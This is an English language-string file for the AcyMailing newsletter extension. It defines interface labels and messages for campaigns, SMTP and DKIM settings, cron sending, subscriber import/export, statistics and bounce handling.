ACYM_FILES="Files"
ACYM_ALLOWED_FILES="Allowed files"
ACYM_EMPTY_TEXTAREA="Empty textarea"
ACYM_DATABASE="Database"
ACYM_SPECIFYTABLE="Please select a table name from your database"
ACYM_SPECIFYFIELDEMAIL="Please select a field for the email"
ACYM_SPECIFYFIELD="The field &quot;%1$s&quot; could not be found. Please specify a field from the table:<br /><b>%2$s</b>"
ACYM_SUBSCRIPTION="Subscription"
ACYM_REQUIRE_CONFIRMATION="Require confirmation"
ACYM_IMPORT_USERS_AS_CONFIRMED="Import the users as confirmed"
ACYM_PARAMETERS="Parameters"
ACYM_UNASSIGNED="Unassigned"
ACYM_IMPORT_THIS_FILE="Import this file"
ACYM_REQUIRED_FIELD="Required field"
ACYM_DEFAULT_VALIDATION_ERROR="Please set a valid data"
ACYM_VALID_NUMBER="Please set a valid number"
ACYM_TEMPLATE_DESIGN="Template design"
ACYM_BORDER="Border"
ACYM_RADIUS="Radius"
ACYM_TEXT="Text"
ACYM_WIDTH="Width"
ACYM_HEIGHT="Height"
ACYM_MY_BUTTON="My button"
ACYM_BUTTON="Button"
ACYM_SPACE="Space"
ACYM_IMAGE="Image"
ACYM_VIDEO="Video"
ACYM_FOLLOW="Follow"
ACYM_SHARE="Share"
ACYM_EDIT_EMAIL="Edit email"
ACYM_CHOOSE_TEMPLATE="Choose template"
ACYM_CAMPAIGN_NOT_FOUND="Campaign not found"
ACYM_CAMPAIGN_NAME="Campaign name"
ACYM_EMAIL_SUBJECT="Email subject"
ACYM_APPLY="Apply"
ACYM_REMOVE="remove"
ACYM_X_CONFIRMATION_SUBSCRIPTION_ADDED_AND_CLICK_TO_SAVE="%s subscriptions added. Please click on the save button to confirm them."
ACYM_SEND_EMPTY="There is no Subject or Body in this e-mail"
ACYM_SEND_ERROR="Error sending message %1$s to %2$s"
ACYM_SEND_SUCCESS="Message %1$s successfully sent to %2$s"
ACYM_SEND_ERROR_USER="User not found: %s"
ACYM_SEND_TEST="Send a test"
ACYM_TEST_EMAIL="If you receive this message, that means your configuration is Ok"
ACYM_OPENSSL="The PHP Extension openssl is not enabled on your server, this extension is required to use an SSL connection, please enable it"
ACYM_ADVICE_BOUNCE="The specified bounce e-mail address %s might cause the problem, please delete it (leave the field bounce address empty) and try again."
ACYM_ADVICE_SMTP_AUTH="You specified an SMTP password but you don't require an authentication, you might want to turn the SMTP authentication ON."
ACYM_ADVICE_LOCALHOST="Your local website may not have a mail server. Please make sure you can send e-mails with the site first (password request, registration confirmation...)."
ACYM_ADVICE_PORT="The port you specified (%s) is not a common port for smtp connexions... Please leave the port empty and give it a new try"
ACYM_ADD_NAMES="Add names"
ACYM_SPECIAL_CHARS="Accept special chars in email addresses"
ACYM_SENDMAIL_PATH="SendMail Path"
ACYM_SMTP_SERVER="Server"
ACYM_SMTP_PORT="Port"
ACYM_SMTP_SECURE="Secure method"
ACYM_SMTP_ALIVE="Keep Alive"
ACYM_SMTP_AUTHENTICATION="Authentication"
ACYM_SMTP_USERNAME="Username"
ACYM_SMTP_PASSWORD="Password"
ACYM_SMTP_AVAILABLE_PORTS="Which port can I use from my website?"
ACYM_SMTP_AVAILABLE_PORT="The port %s is available."
ACYM_SMTP_NOT_AVAILABLE_PORT="The port %1$s is not opened on your server: %2$s"
ACYM_FSOCKOPEN="fsockopen is not enabled, please contact your hosting company to enable it"
ACYM_API_KEY="API key"
ACYM_REST_API="REST API"
ACYM_DKIM_SETTINGS="DKIM Settings"
ACYM_DKIM_SAVE="Please save your AcyMailing configuration to generate the DKIM keys"
ACYM_DKIM_CONFIGURE="Configure your DNS by adding a TXT record on your domain %s using the key/value as shown below:"
ACYM_DKIM_KEY="Key"
ACYM_DKIM_VALUE="Value"
ACYM_DKIM_LET_ME="Let me enter my own keys."
ACYM_DKIM_DOMAIN="Domain"
ACYM_DKIM_SELECTOR="Selector"
ACYM_DKIM_PASSPHRASE="Passphrase"
ACYM_DKIM_IDENTITY="Identity"
ACYM_DKIM_PRIVATE="Private key"
ACYM_DKIM_PUBLIC="Public Key"
ACYM_CRON="Cron"
ACYM_CRON_WRONG_DOMAIN="The domain name is not valid (%s). If you use your own cron system, please make sure you trigger AcyMailing with the full domain name."
ACYM_CRON_TRIGGERED="AcyMailing Triggered at %s"
ACYM_CRON_NEXT="The system won't be triggered before %s"
ACYM_AUTO_SEND_PROCESS="Automatic send process"
ACYM_SEND_X_EVERY_Y="Send %1$s e-mails every %2$s"
ACYM_SECONDS="Seconds"
ACYM_MINUTES="Minutes"
ACYM_HOURS="Hours"
ACYM_DAYS="Days"
ACYM_WEEKS="Weeks"
ACYM_MONTHS="Months"
ACYM_MANUAL_SEND_PROCESS="Manual send process"
ACYM_SEND_X_WAIT_Y="Send %1$s e-mails and then wait %2$s before sending another batch"
ACYM_MAX_EXECUTION_TIME="Maximum execution time"
ACYM_TIMEOUT_SERVER="Based on your server configuration, each batch can run for %s seconds"
ACYM_TIMEOUT_CURRENT="We are currently checking your real maximum execution time... At least %s seconds so far"
ACYM_MAX_RUN="Based on our check, we can run each batch for %s seconds"
ACYM_TIMEOUT_AGAIN="Calculate the real maximum execution time again"
ACYM_ORDER_SEND_QUEUE="Order the send process by"
ACYM_RANDOM="Random"
ACYM_NO_RAND_FOR_MULTQUEUE="You should not use the random ordering if you use the multiple queue system."
ACYM_CREATE_CRON_REMINDER="Your cron does not seem to be enabled, don't forget to create it!"
ACYM_REPORT="Report"
ACYM_REPORT_SEND="Send a report"
ACYM_REPORT_SEND_TO="Send the report to"
ACYM_REPORT_SAVE="Save the report"
ACYM_REPORT_SAVE_TO="Save the report to"
ACYM_REPORT_DELETE="Delete the report"
ACYM_REPORT_SEE="See the report"
ACYM_EACH_TIME="Each time AcyMailing is triggered"
ACYM_ONLY_ACTION="Only if AcyMailing executes an action"
ACYM_SIMPLIFIED_REPORT="Simplified Report"
ACYM_DETAILED_REPORT="Detailed Report"
ACYM_ONLY_SOMETHING_WRONG="Only if an error occurs"
ACYM_MINUTES_AGO="%s minutes ago"
ACYM_CURRENT_TIME="Your current time is %s"
ACYM_WRONG_LOG_NAME="The log file must only contain alphanumeric characters and end with .log"
ACYM_EMPTY_LOG="The log file is empty"
ACYM_SUCC_DELETE_LOG="Log file successfully deleted"
ACYM_ERROR_DELETE_LOG="Could not delete the Log file"
ACYM_EXIST_LOG="Log file does not exist"
ACYM_LAST_CRON="Last Cron"
ACYM_LAST_RUN="Last Run time"
ACYM_CRON_TRIGGERED_IP="Triggered from the IP"
ACYM_SEND="Send"
ACYM_CAMPAIGN_ADDED_TO_QUEUE="The campaign <b>%s</b> has been added to the queue"
ACYM_ERROR_QUEUE_CAMPAIGN="Couldn't add the campaign %s to the queue"
ACYM_CAMPAIGN_ALREADY_QUEUED="This campaign is already in the queue"
ACYM_QUEUE="Queue"
ACYM_QUEUE_AUTOMATED="Automated emails"
ACYM_QUEUE_DETAILED="Detailed queue"
ACYM_PAUSED="Paused"
ACYM_ADDED_QUEUE_SCHEDULE="%1$s emails have been added to the queue for the Scheduled Campaign %2$s"
ACYM_SELECT_TABLE="Select a table"
ACYM_FIELD_MATCHING="Field matching"
ACYM_ASSIGN_COLUMNS="Please match <b>AcyMailing standard fields</b> (email, name...) with the <b>fields you are importing</b>."
ACYM_ENCODING="Encoding"
ACYM_USERS_FROM_LISTS="Users from lists"
ACYM_ALL_USERS="All users"
ACYM_USERS_TO_EXPORT="Users to export"
ACYM_EXPORT_SELECT_LIST="Please select at least one list"
ACYM_EXPORT_SELECT_FIELD="Please select at least one field to export"
ACYM_DATA_WILL_EXPORT_CSV_FORMAT="Data will be exported to CSV format"
ACYM_FIELDS_TO_EXPORT="Fields to export"
ACYM_X_RECIPIENTS="%s recipients"
ACYM_QUEUE_SENDING="Sending..."
ACYM_QUEUE_READY="Ready to be sent"
ACYM_CANCEL_CAMPAIGN="Cancel campaign"
ACYM_ARE_YOU_SURE="Are you sure?"
ACYM_IMPORT_ERROR_WRONG_NUMBER_ARGUMENTS="The number of arguments doesn't match with number of columns"
ACYM_ADDRESSES_INVALID="One or more address(es) are invalid and couldn't be imported"
ACYM_INVALID_EMAIL_ADDRESS="Invalid address"
ACYM_ALL_USER_WILL_BE_EXPORTED="All the users will be exported"
ACYM_SUMMARY_NUMBER_RECEIVERS_EXPLICATION="Some users are subscribed to several lists, but they are counted only one time on this total. They will received only one email."
ACYM_AUDIENCE="Audience"
ACYM_AUTOAMTION="Automation"
ACYM_VIEW_ALL_LISTS="View all lists"
ACYM_CREATE_LIST="Create list"
ACYM_CAMPAIGNS_SCHEDULED="Campaigns scheduled"
ACYM_NONE_OF_YOUR_CAMPAIGN_SCHEDULED_GO_SCHEDULE_ONE="None of your campaigns are scheduled. Go schedule one!"
ACYM_YOUR_EMAIL="your.mail@example.com"
ACYM_FROM_MAIL_ADDRESS="From mail address"
ACYM_USING_YOUR_SERVER="Using your server"
ACYM_USING_AN_EXTERNAL_SERVER="Using an external server"
ACYM_PHP_MAIL_FUNCTION="PHP Mail Function"
ACYM_SAFE_CHECK="Safe check"
ACYM_ONLYAUTOPROCESS="You configured AcyMailing to use the automatic send process only. You can't trigger the send process via this button unless you allow the manual send process via the AcyMailing configuration page"
ACYM_TRY="Try"
ACYM_NO_PROCESS="There is nothing to send"
ACYM_SEND_PROCESS="Send Process"
ACYM_DONT_CLOSE="You must keep this popup opened to continue sending. If you want to be able to close the page and turn Off your computer, you can let the cron task run the automatic send process (only available in our commercial versions)"
ACYM_QUEUE_DOUBLE="Send process running in parallel detected, the system stopped but you will be able to resume it"
ACYM_QUEUE_NEXT_TRY="Next try in %s minutes"
ACYM_SEND_REFRESH_TIMEOUT="Process refreshed to avoid a time limit"
ACYM_SEND_REFRESH_CONNECTION="Process refreshed to avoid a possible loss of connection"
ACYM_SEND_STOPED="The Send Process stopped because there are too many errors"
ACYM_SEND_KEPT_ALL="The system kept all non delivered e-mails in the queue, so you will be able to resume the send process later"
ACYM_SEND_CHECKONE="Please verify your mail configuration and make sure you can send a test of this e-mail"
ACYM_SEND_ADVISE_LIMITATION="If you recently, successfully, sent a lot of e-mails, those errors may also be due to your server limitations"
ACYM_SEND_REFUSE="Your server apparently refuses to send more e-mails"
ACYM_SEND_CONTINUE_COMMERCIAL="Using one of our commercial versions, the system would be able to continue automatically the send process using a Cron"
ACYM_SEND_CONTINUE_AUTO="If you configured a cron task, the system will automatically continue the send process"
ACYM_CONFIG_TRY="Try %s times to deliver the message."
ACYM_CONFIG_TRY_ACTION="If it still fails, %s"
ACYM_MAX_NB_TRY="Maximum number of tries"
ACYM_MAX_NB_TRY_DESC="If AcyMailing can not send the e-mail after X tries, AcyMailing will delete the e-mail from the queue."
ACYM_DO_NOTHING="Do nothing"
ACYM_REMOVE_SUB="Delete the user subscription"
ACYM_UNSUB_USER="Unsubscribe the user"
ACYM_SUBSCRIBE_USER="Subscribe the user"
ACYM_BLOCK_USER="Block the user"
ACYM_SEND_NOW="Send now"
ACYM_SEND_ALL="Send all"
ACYM_NB_SCHEDULED="%s campaign(s) scheduled"
ACYM_CRON_PROCESS="%1$s messages processed: %2$s successful, %3$s failed"
ACYM_INSERT_IMG_BAD_NAME="The name of the picture is not correct and may not be displayed on some mail clients. Do you want to insert it?"
ACYM_NON_VALID_URL="It's not a valid url. Please correct it and try again."
ACYM_SUBSCRIBED_USER="Subscribed users"
ACYM_UNSUBSCRIBED_USER="Unsubscribed users"
ACYM_COLLAPSE="Collapse"
ACYM_DONT_HAVE_STATS_CAMPAIGN="You didn't send any campaign yet."
ACYM_DONT_HAVE_STATS_THIS_CAMPAIGN="You don't have any statistics in this campaign, send it!"
ACYM_LOOK_AT_THESE_AMAZING_DONUTS="Here are some examples of what you'll see."
ACYM_FAIL="Fail"
ACYM_CLICK_RATE="Click rate"
ACYM_OPEN_RATE="Open rate"
ACYM_OR_THIS_AWESOME_CHART_LINE="And awesome chart lines!"
ACYM_START="Start: "
ACYM_END="End: "
ACYM_BY_HOUR="By hour"
ACYM_BY_DAY="By day"
ACYM_BY_MONTH="By month"
ACYM_YOU_DONT_HAVE_ANY_DATA_ON_THIS_CAMPAIGN="<b>You don't have any open data/click data on this campaign</b>"
ACYM_HERE_AN_EXEMPLE_OF_WHAT_YOU_CAN_GET="Here is an example of what you can get when you will have data!"
ACYM_GLOBAL_STATISTICS="Global statistics"
ACYM_DETAILED_STATS="Detailed statistics"
ACYM_SEND_DATE="Send date"
ACYM_MAILS_OPEN="Mails open"
ACYM_OPEN_DATE="Open date"
ACYM_YOU_DONT_HAVE_ANY_USER="You don't have any user."
ACYM_YOU_DONT_HAVE_ANY_LIST="You don't have any list."
ACYM_CREATE_YOUR_FIRST_ONE="Create your first one!"
ACYM_YOU_DONT_HAVE_ANY_TEMPLATE="You don't have any template."
ACYM_CREATE_AN_AMAZING_TEMPLATE_WITH_OUR_AMAZING_EDITOR="Create an amazing template with our amazing editor!"
ACYM_CREATE_ONE_NOW="Create one now!"
ACYM_YOU_DONT_HAVE_ANY_AUTOMATION="You don't have any automation"
ACYM_CREATE_ONE_AND_LET_ACYAMAILING_DO_IT="Create one and let AcyMailing do it!"
ACYM_OPENED="Opened"
ACYM_ID="ID"
ACYM_CREATE_ONE="Create one"
ACYM_CREATE_OR_IMPORT_YOUR_FIRST_ONE="Create or import your first one!"
ACYM_ADD_RECIPIENTS_TO_SEND_THIS_CAMPAIGN="Add recipients to send this campaign"
ACYM_YOU_DONT_HAVE_ANY_CAMPAIGN_IN_QUEUE="You don't have any campaign in the queue"
ACYM_SEND_ONE_AND_SEE_HOW_AMAZING_QUEUE_IS="Send one and see how amazing the queue is!"
ACYM_CAMPAIGN_HAS_BEEN_SENT_TO_A_TOTAL_OF="Campaign has been sent to a total of %s recipients"
ACYM_THIS_CAMPAIGN_HAS_BEEN_SENT_ON_AT="This campaign has been sent on %1$s at %2$s"
ACYM_ARE_YOU_SURE_DELETE="Are you sure you want to delete these elements?"
ACYM_ARE_YOU_SURE_INACTIVE="Are you sure you want to disable these elements?"
ACYM_ARE_YOU_SURE_ACTIVE="Are you sure you want to enable these elements?"
ACYM_CREATE_CAMPAIGN_EMPTY_TEMPLATE="Please create a template with our amazing editor or create a campaign with an empty template"
ACYM_X_ALREADY_EXIST="%s already exist"
ACYM_WEBSITE_LINKS="Website links"
ACYM_TIME="Time"
ACYM_SUBSCRIBER="Subscriber"
ACYM_RECEIVER_INFORMATION="Receiver information"
ACYM_USER_FIRSTPART="First part of the user name"
ACYM_USER_LASTPART="Last part of the user name"
ACYM_USER_FIRSTPART_DESC="For example the first part of the user John Doe is John"
ACYM_USER_LASTPART_DESC="For example the last part of the user John Doe is Doe"
ACYM_USER_ID="User id"
ACYM_USER_NAME="User name"
ACYM_USER_EMAIL="User email"
ACYM_USER_CREATION_DATE="User creation date"
ACYM_USER_SOURCE="User source"
ACYM_USER_CONFIRMED="User confirmed"
ACYM_USER_SEND_DATE="User last send date"
ACYM_USER_OPEN_DATE="User last open date"
ACYM_USER_CLICK_DATE="User last click date"
ACYM_INSERT="Insert"
ACYM_DATE_FORMAT_LC3="d F Y"
ACYM_DATE_FORMAT_LC4="Y-m-d"
ACYM_UNSUBSCRIBE_LINK="Insert an <b>unsubscribe / modify your subscription</b> link in your email"
ACYM_CONFIRM_SUBSCRIPTION_LINK="Insert a <b>confirm your subscription</b> link in your email"
ACYM_SUBSCRIBE_LINK="Insert a <b>subscribe</b> link in your email"
ACYM_CONFIRM_SUBSCRIPTION="Click here to confirm your subscription"
ACYM_LIST_NAMES="List names"
ACYM_DYNAMIC_TEXT="Dynamic text"
ACYM_TIME_FORMAT="Time format"
ACYM_LISTS_SELECTED="List(s) selected: "
ACYM_VIEW_ONLINE="Click here to view it online"
ACYM_VIEW_ONLINE_DESC="Insert a <b>view it online</b> link in your email"
ACYM_CMS_USER="%s user"
ACYM_LOGIN_NAME="Login name of the user"
ACYM_USER_GROUPS="User groups"
ACYM_NO_GROUP="No group"
ACYM_CUSTOM_FIELDS="Custom fields"
ACYM_VISITOR="Visitor"
ACYM_DEFAULT="Default"
ACYM_CONFIRMED_CAMPAIGN="The campaign has been confirmed. It will be add to the queue at <b>%s</b>"
ACYM_CANT_CONFIRM_CAMPAIGN="The campaign couldn't be confirmed"
ACYM_TEMPLATE_CHANGED_CLICK_ON_SAVE="Your template has been changed please save the modifications by clicking the save button"
ACYM_MIGRATED_TEMPLATE="Migrated template"
ACYM_DO_YOU_WANT_TO_MIGRATE="First of all, do you want to migrate some data from your old AcyMailing component?"
ACYM_WHICH_DATA_TO_MIGRATE="Which data do you want to migrate?"
ACYM_MIGRATE="Migrate"
ACYM_NO_DONT_WANT_TO_MIGRATE_MY_DATA="No, I don't want to migrate my data"
ACYM_GLOBAL_STATS="Global statistics"
ACYM_MIGRATION_DONE="Migration done!"
ACYM_CONTINUE="Continue"
ACYM_NEWSLETTERS="Newsletters"
ACYM_RESTART_FROM_ERROR="Restart from error"
ACYM_IGNORE_ERRORS_AND_CONTINUE="Ignore errors and continue"
ACYM_MIGRATE_WARNING_DATA_OVERWRITE_MESSAGE="If you choose to migrate your old AcyMailing data (5.X version) then your AcyMailing 6 data will be overwritten. So please make sure you won't lose any important data stored in your AcyMailing 6 instance."
ACYM_CLEAN_ERROR="Clean error"
ACYM_INSERT_ERROR="Insert error"
ACYM_FIELD_TYPE="Field type"
ACYM_REQUIRED="Required"
ACYM_LISTING="Listing"
ACYM_CANT_DELETE="You can't delete core elements"
ACYM_TEXTAREA="Textarea"
ACYM_RADIO="Radio"
ACYM_CHECKBOX="Checkbox"
ACYM_SINGLE_DROPDOWN="Single dropdown"
ACYM_MULTIPLE_DROPDOWN="Multiple dropdown"
ACYM_DATE="Date"
ACYM_FILE="File"
ACYM_PHONE="Phone"
ACYM_CUSTOM_TEXT="Custom text"
ACYM_CATEGORY="Category"
ACYM_EDITABLE_USER_CREATION="Editable on user creation"
ACYM_EDITABLE_USER_MODIFICATION="Editable on user modification"
ACYM_CUSTOM_ERROR="Custom error message"
ACYM_NUMBER_ONLY="Number only"
ACYM_LETTERS_ONLY="Letters only"
ACYM_NUMBERS_LETTERS_ONLY="Numbers and letters only"
ACYM_REGULAR_EXPRESSION="My regular expression"
ACYM_AUTHORIZED_CONTENT="Authorized content"
ACYM_DEFAULT_VALUE="Default value"
ACYM_ERROR_MESSAGE_INVALID_CONTENT="Error message to display if content isn't respected"
ACYM_ROWS="Rows"
ACYM_COLUMNS="Columns"
ACYM_VALUE="Value"
ACYM_ADD_VALUE="Add a new value"
ACYM_WHERE="Where"
ACYM_WHERE_VALUE="Where value"
ACYM_WHERE_OPERATION="Where operation"
ACYM_ORDER_BY="Order by"
ACYM_SORT_ORDERING="Sort ordering"
ACYM_TABLES="Tables"
ACYM_INPUT_WIDTH="Input width (px)"
ACYM_X_TO_ENTER_X="%1$s to enter the %2$s"
ACYM_DAY="Day"
ACYM_MONTH="Month"
ACYM_YEAR="Year"
ACYM_EXEMPLE_FORMAT="For example with the format %d%m%y the date will be 14/06/1997"
ACYM_PHONE_NOCOUNTRY="No country"
ACYM_NO_FILE_CHOSEN="No file chosen"
ACYM_CHOOSE_FILE="Choose file"
ACYM_FIELDS_TO_DISPLAY="Fields to display"
ACYM_ERROR_QUEUE_CANCEL_CAMPAIGN="Can't access to campaign"
ACYM_CONFIRMATION_CANCEL_CAMPAIGN_QUEUE="Are you sure you want to cancel this campaign? If the campaign was sent to, at least, one receiver, you won't be able to edit or resend the campaign"
ACYM_ERROR_QUEUE_PAUSE="Couldn't pause campaign"
ACYM_ERROR_QUEUE_RESUME="Couldn't resume campaign"
ACYM_LOAD_LATEST_LANGUAGE="Load the latest version from our server"
ACYM_CUSTOM_TRANS="Custom translations"
ACYM_CUSTOM_TRANS_DESC="The following strings won't be overwritten if you update/upgrade AcyMailing"
ACYM_LOAD_ENGLISH_1="AcyMailing is currently not translated in this language."
ACYM_LOAD_ENGLISH_2="The English version will be loaded so that you can translate it."
ACYM_LOAD_ENGLISH_3="Once done, don't forget to share your translation with the rest of the community! Even 10 lines translated will make the difference ;)"
ACYM_SHARE_CONFIRMATION_1="This Language File <b>will be sent to the Acyba translation team</b> and may be included in the next version."
ACYM_SHARE_CONFIRMATION_2="By sharing this file, you allow Acyba to use your work for any purpose."
ACYM_SHARE_CONFIRMATION_3="You can add a personal message in the following area which will be included in the e-mail sent to the team."
ACYM_THANK_YOU_SHARING="Thank you for your contribution!"
ACYM_SEND_CAMPAIGN="Send campaign"
ACYM_SHARE_TRANSLATION="Share your translation"
ACYM_EMAIL_BODY="Email body:"
ACYM_SURE_SEND_TRANSALTION="Are you sure you want to send us this translation? Please do not send it if you didn't modify the translation."
ACYM_MESSAGE_SENT="The message has been sent to Acyba's support team."
ACYM_CONFIRMATION_REDIRECTION="Redirection after confirmation"
ACYM_ALREADY_CONFIRMED="You have already confirmed your subscription"
ACYM_SUBSCRIPTION_CONFIRMED="Your subscription has been confirmed"
ACYM_TEST="Tests"
ACYM_SAFE_CHECK_DESC="Safe check tests need to be run before you can send your campaign."
ACYM_TEST_ADDRESS="test@example.com..."
ACYM_SEND_TEST_TO="Send test mail to"
ACYM_TESTS_SPAM="SPAM score > 80%"
ACYM_TESTS_SAFE_CONTENT="Safe content"
ACYM_TESTS_LINKS="All links checked"
ACYM_TESTS_CONTENT_DESC="The following expressions are not recommended:"
ACYM_SPAMTEST_MISSING_EMAIL="Missing test mail address"
ACYM_ERROR_LOAD_FROM_ACYBA="Could not load your information from our server"
ACYM_TESTS_SPAM_SENT="Test email sent, waiting for the report..."
ACYM_MENU="AcyMailing: %s"
ACYM_MENU_FORM="Newsletter subscription form"
ACYM_MENU_FORM_DESC="Form used by your users to subscribe to the contact lists in order to receive your newsletters"
ACYM_MENU_PROFILE="User profile"
ACYM_MENU_PROFILE_DESC="This element gives your visitors or logged-in users a way to subscribe / modify their subscription."
ACYM_VISIBLE_LISTS="Visible lists"
ACYM_VISIBLE_LISTS_DESC="The following selected lists will be displayed on your subscribe form."
ACYM_DROPDOWN_LISTS="Lists in a dropdown"
ACYM_DROPDOWN_LISTS_DESC="Display the visible lists in a dropdown"
ACYM_LISTS_CHECKED_DEFAULT="Lists checked by default"
ACYM_ALLOW_VISITOR="Allow non-logged in users"
ACYM_ONLY_LOGGED="The subscription is restricted to logged in users"
ACYM_USER_INFORMATION="User Information"
ACYM_CONFIGURATION_DATA_COLLECTION="Data collection"
ACYM_CONFIDENTIALITY="Confidentiality"
ACYM_TRACKING="Tracking"
ACYM_TRACKINGSYSTEM="Track clicks with"
ACYM_TRACKINGSYSTEM_EXTERNAL_LINKS="Track links for external websites"
ACYM_GDPR_EXPORT_BUTTON="Allow users to export their data from their profile page"
ACYM_EXPORT_MY_DATA="Export my data"
ACYM_DELETE_MY_DATA="Delete all my data"
ACYM_DELETE_MY_DATA_CONFIRM="This will permanently delete all your data"
ACYM_MODIFY_SUBSCRIPTION="Modify your Subscription"
ACYM_SAVE_CHANGES="Save Changes"
ACYM_GENERATE_NAME="Auto-generate User's name"
ACYM_NOT_ALLOWED_MODIFY_USER="You are not allowed to modify this user"
ACYM_ALLOW_MODIFICATION="Allow user data modifications without identification"
ACYM_ALLOW_ONLY_THEIRS="Only their subscription"
ACYM_ADDRESS_TAKEN="This email address is already taken by another user"
ACYM_SUBSCRIPTION_UPDATED_OK="Subscription successfully updated"
ACYM_IDENTIFICATION_SENT="An email to verify your identity has been sent.<br />Please click on the link in the email to be able to modify your subscription."
ACYM_NEW_CUSTOM_FIELD="New custom field"
ACYM_UPLOAD_FOLDER="Upload folder"
ACYM_ADD_ATTACHMENT="Attach a new file"
ACYM_MAX_UPLOAD="(total max upload file size: %s)"
ACYM_SUCCESS_FILE_UPLOAD="File successfully uploaded"
ACYM_FILE_RENAMED="An image with this name already exists. Image has been renamed as %s"
ACYM_ACCEPTED_TYPE="This file type (%1$s) is not accepted, the accepted file types are: %2$s"
ACYM_SELECT="Select"
ACYM_NO_FILE_HERE="No file here"
ACYM_DD_EDITOR="Drag & Drop Editor"
ACYM_LOAD_STYLESHEET="Load style sheet"
ACYM_CUSTOM_ADD_STYLESHEET="Add custom style sheet"
ACYM_HERE_PASTE_YOUR_STYLESHEET="Here you can paste your style sheet"
ACYM_SUCCESSFULLY_SENT="Successfully sent"
ACYM_FIELDS_TO_DISPLAY_DESC="The selected fields will be displayed on the registration form"
ACYM_DOCUMENTATION="Documentation"
ACYM_NEXT="Next"
ACYM_SKIP="Skip"
ACYM_INTRO_ADD_DTEXT="Here you can add dynamic text to your email"
ACYM_INTRO_TEMPLATE="Here is you template"
ACYM_INTRO_DRAG_BLOCKS="You can drag these blocks to your template to add them"
ACYM_INTRO_DRAG_CONTENT="You can then drag these contents in the blocks"
ACYM_INTRO_SETTINGS="Here are the settings of your template"
ACYM_INTRO_CUSTOMIZE_FONT="You can customize your font here"
ACYM_INTRO_IMPORT_CSS="Here you can import your stylesheet"
ACYM_INTRO_SAFE_CHECK="The safe check analyses the content of your email, it checks if there is any spam word then all the links if they are not broken and it finally checks your mail using our spam test tool"
ACYM_INTRO_MAIL_SETTINGS="Here you can configure your sending method"
ACYM_INTRO_ADVANCED="Here is the advanced configuration, this is where you configure the technical part."
ACYM_INTRO_DKIM="DKIM is a way to prove that all the emails you send come from you"
ACYM_INTRO_CRON="The cron is a process that checks every 15 minutes if there are actions to do like sending queued emails, sending scheduled emails, processing the bounce handling, etc..."
ACYM_INTRO_SUBSCRIPTION="Here you can set the settings of the email which is sent when a user subscribes"
ACYM_INTRO_CHECK_DATABASE="This button will check if there is any issue in the database like a missing table/column etc...<br />If you have any issue with your database it's the first thing to do"
ACYM_SEND_TEST_SUCCESS="The test was successfully sent"
ACYM_SEND_TEST_ERROR="Error sending the test"
ACYM_CUSTOM_FIELD="Custom field"
ACYM_BECARFUL_BACKGROUND_IMG="Be careful if you insert background image, not all the email clients display them"
ACYM_SEPARATOR="Separator"
ACYM_INTRO_ONLY="Intro only"
ACYM_FULL_TEXT="Full text"
ACYM_PUBLISHING_DATE="Publishing date"
ACYM_CLICKABLE_TITLE="Clickable title"
ACYM_RESIZED="Resized"
ACYM_NO_RESULTS_FOUND="No results found"
ACYM_ONE_BY_ONE="One by one"
ACYM_BY_CATEGORY="By category"
ACYM_MAX_NB_ELEMENTS="Max. number of elements"
ACYM_MODIFICATION_DATE="Modification date"
ACYM_ASC="Ascending"
ACYM_DESC="Descending"
ACYM_READ_MORE="Read more"
ACYM_TITLE_ONLY="Title only"
ACYM_DISPLAY="Display"
ACYM_TRUNCATE="Truncate the text"
ACYM_TRUNCATE_AFTER="After %s characters"
ACYM_FROM="From"
ACYM_TO="To"
ACYM_LOCATION="Location"
ACYM_COUNTRY="Country"
ACYM_STATE="State"
ACYM_CITY="City"
ACYM_ADDRESS="Address"
ACYM_PRICE="Price"
ACYM_APPLY_DISCOUNTS="Apply discounts"
ACYM_COUPON="Coupon"
ACYM_CHECK_EMAIL_COUPON="Please check your e-mail to see the coupon"
ACYM_NONE="None"
ACYM_COPY_DEFAULT_TRANSLATIONS="Copy default translations"
ACYM_COPY_DEFAULT_TRANSLATIONS_CONFIRM="This will override the current custom translations and keep the additional language keys you may have created."
ACYM_USE_THIS_FEATURE="To use this feature please upgrade your version to %s"
ACYM_UPGRADE_NOW="Upgrade now!"
ACYM_NO_DISCOUNT="No discount"
ACYM_EDIT_MAIL="Edit email"
ACYM_MENU_ARCHIVE="Newsletters archive"
ACYM_MENU_ARCHIVE_DESC="Show the sent newsletters"
ACYM_WIDGET_ARCHIVE_CHOICE="Display"
ACYM_LAST_X_NEWSLETTERS="Last %s newsletters"
ACYM_BOUNCE_HANDLING="Bounce handling"
ACYM_CONNECTION_METHOD="Connection method"
ACYM_SELF_SIGNED_CERTIFICATE="Self-signed certificate"
ACYM_CONNECTION_TIMEOUT_SECOND="Connection timeout (seconds)"
ACYM_MAX_NUMBER_EMAILS="Maximum number of e-mails"
ACYM_ENABLE_AUTO_BOUNCE="Enable the automatic bounce handling"
ACYM_FREQUENCY="Frequency"
ACYM_NEXT_RUN_TIME="Next run time"
ACYM_BOUNCES="Bounces"
ACYM_ACTION_ON_USER="Action on the user"
ACYM_FORWARD_EMAIL="Forward the message to"
ACYM_BOUNCE_CONNECT_SUCC="Successfully connected to %s"
ACYM_NB_MAIL_MAILBOX="There are %s messages in your mailbox"
ACYM_BOUNCE_RULE="Rule"
ACYM_CLICK_BOUNCE="Handle the messages now"
ACYM_EXECUTE_REGEX_ON="Execute the regex on"
ACYM_INCREMENT_BOUNCE_STATISTICS_IF_RULE_MATCHES="Increment the bounce statistics if the rule matches"
ACYM_ENABLED="Enabled"
ACYM_BODY="Body"
ACYM_GLOBAL_INFORMATION="Global information"
ACYM_REGEX="Regex"
ACYM_EXECUTE_ACTIONS_AFTER="Execute the following actions only after receiving %s bounce messages from this user"
ACYM_ACTION_ON_EMAIL="Action on the email"
ACYM_DELETE_USER_SUBSCRITION="Delete the user subscription"
ACYM_UNSUBSCRIBE_USER="Unsubscribe the user"
ACYM_SUBSCRIBE_USER_TO="Subscribe the user"
ACYM_EMPTY_QUEUE_USER="Empty the queue for the user"
ACYM_SAVE_MESSAGE_DATABASE="Save message in database"
ACYM_DELETE_MESSAGE_FROM_MAILBOX="Delete the message from your mailbox"
ACYM_ACTION_REQUIRED="Action required"
ACYM_ACKNOWLEDGMENT_RECEIPT_SUBJECT="Acknowledgement of receipt - in subject"
ACYM_FEEDBACK_LOOP="Feedback loop"
ACYM_FEEDBACK_LOOP_BODY="Feedback loop - in body"
ACYM_MAILBOX_FULL="Mailbox Full"
ACYM_BLOCKED_GOOGLE_GROUPS="Blocked by Google Groups"
ACYM_MAILBOX_DOESNT_EXIST_1="Mailbox does not exist 1"
